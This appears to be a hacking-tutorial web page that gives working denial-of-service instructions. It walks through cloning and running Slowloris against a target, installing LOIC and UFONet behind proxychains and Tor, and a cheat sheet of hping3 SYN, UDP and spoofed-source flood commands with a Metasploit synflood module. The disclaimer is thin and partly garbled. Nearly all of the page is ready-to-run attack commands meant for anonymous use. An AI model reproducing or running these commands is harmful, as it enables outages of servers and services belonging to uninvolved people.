Welcome to Slowloris - the low bandwidth, yet greedy and poisonous HTTP client!
Slowloris is a type of denial of service attack tool invented by Robert "RSnake" Hansen which allows a single machine to take down another machine's web server with minimal bandwidth and side effects on unrelated services and ports.ports..
Slowloris tries to keep many connections to the target web server open and hold them open as long as possible. It accomplishes this by opening connections to the target web server and sending a partial request. Periodically, it will send subsequent HTTP headers, adding to—but never completing—the request. Affected servers will keep these connections open, filling their maximum concurrent connection pool, eventually denying additional connection attempts from clients.
HOW TO USE
root@kali:~# git clone https://github.com/MREKOVAC/slowloris.pl.git
root@kali:~#cd slowloris.pl
root@kali:/slowloris.pl# chmod +x slowloris.pl
root@kali:~# nmap --script http-slowloris-check <target>
root@kali:~# proxychains perl slowloris.pl -dns www.example.com -port 80 -test
root@kali:~# proxychains perl slowloris.pl -dns www.example.com -port 80 -timeout 2 -num 6666 -tcpto 5
root@kali:~# proxychains perl slowloris.pl -dns example.com
Requirements: This is a Perl program requiring the Perl interpreter with the modules IO::Socket::INET, IO::Socket::SSL, and GetOpt::Long. Slowloris works MUCH better and faster if you have threading, so I highly encourage you to also install threads and threads::shared if you don't have those modules already. You can install modules using CPAN:
root@kali:~# perl -MCPAN -e install IO::Socket::INET
root@kali:~# perl -MCPAN -e install IO::Socket::SSL
Windows users: You probably will not be able to successfuly execute a Slowloris denial of service from Windows even if you use Cygwin. I have not had any luck getting Slowloris to successfuly deny service from within Windows, because Slowloris requires more than a few hundred sockets to work (sometimes a thousand or more), and Windows limits sockets to around 130, from what I've seen. I highly suggest you use a *NIX operating system to execute Slowloris from for the best results, and not from within a virtual machine, as that could have unexpected results based on the parent operating system.
Disclaimer hackerschool.app harms others, it is not an illegal breakthrough, for the development of network technologies and strengthening personal skills
It is a place to study security technology. hackerschool.app does not provide any illegal data.
If you encounter such material through the website, the user is solely responsible for the consequences of its use.
How To Install Low Orbit Ion Cannon In Kali Linux
root@kali:~# sudo apt install apt-transport-https dirmngr
root@kali:~# sudo apt-key adv --keyserver hkp://keyserver.ubuntu.com:80 --recv-keys 3FA7E0328081BFF6A14DA29AA6A19B38D3D831EF
root@kali:~# echo "deb https://download.mono-project.com/repo/debian vs-buster main" | sudo tee /etc/apt/sources.list.d/mono-official-vs.list
root@kali:~#sudo apt update
root@kali:~# aptitude install git-core monodevelop
root@kali:~# apt install mono-gmcs gnome-system-monitor mono-gmcs monodevelop mono-complete
root@kali:~# cd/root/Desktop
root@kali:~# mkdir loic
root@kali:~# cd loic
root@kali:/loic# wget https://raw.githubusercontent.com/nicolargo/loicinstaller/master/loic.sh
root@kali:/loic# chmod 777 loic.sh
root@kali:/loic#./loic.sh install
root@kali:/loic#./loic.sh update
root@kali:/loic# proxychains ./loic-net4.0.sh run
root@kali:~# git clone https://github.com/epsylon/ufonet
root@kali:~# apt install proxychains
root@kali:~# apt install tor
root@kali:~# service tor start
root@kali:~# service tor status
root@kali:~ufonet# proxychains python3 ufonet --auto-search
DoS cheat sheet
SYN Flooding
SYN flooding takes advantage of a flaw with regard to how most hosts implement the TCP three-way handshake. This attack occurs when the intruder sends unlimited SYN packets (requests) to the host system. The process of transmitting such packets is faster than the system can handle. Normally, the connection establishes with the TCP three-way handshake, and the host keeps track of the partially open connections while waiting in a listening queue for response ACK packets.
Using Metasploit
msfconsole
use auxiliary/dos/tcp/synflood
PoD attack
The attacker tries to crash, freeze, or destabilize the targeted system or service by sending malformed or oversized packets using a simple ping command.
Using hping3
hping3 --d 65538 -S -p 21 --flood [Target IP]
-d: Specifies data size.
-S: Sets the SYN flag.
-p: Specifies the destination port.
--flood: Sends a huge number of packets.
Spoof source IP
Using hping3
hping3 -S [Target IP] -a [IP Spoofed]
-S: Sets the SYN flag.
-a: Spoofs the IP address.
-p: Specifies the destination port.
--flood: Sends a huge number of packets.
UDP application layer flood attack
Using hping3
hping3 -2 -p 139 --flood [Target IP]
-2: Specifies the UDP mode.
-p: Specifies the destination port.
--flood: Sends a huge number of packets.
